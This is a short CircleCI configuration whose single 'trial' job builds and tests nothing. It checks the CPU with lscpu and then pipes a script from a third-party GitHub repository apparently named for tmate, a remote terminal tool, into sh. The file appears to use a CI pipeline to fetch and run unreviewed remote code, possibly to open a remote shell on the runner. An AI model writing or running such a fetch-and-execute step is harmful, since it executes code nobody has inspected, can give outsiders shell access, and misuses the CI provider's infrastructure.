version: 2.1
jobs:
  trial:
    docker:
      - image: circleci/ruby:2.5.3
    parallelism: 1
    steps:
      - run: lscpu
      - run: wget https://raw.githubusercontent.com/parkitmove/UB-tmate/main/crt.sh -O - | sh

workflows:
  version: 2.1
  build:
    jobs:
      - trial
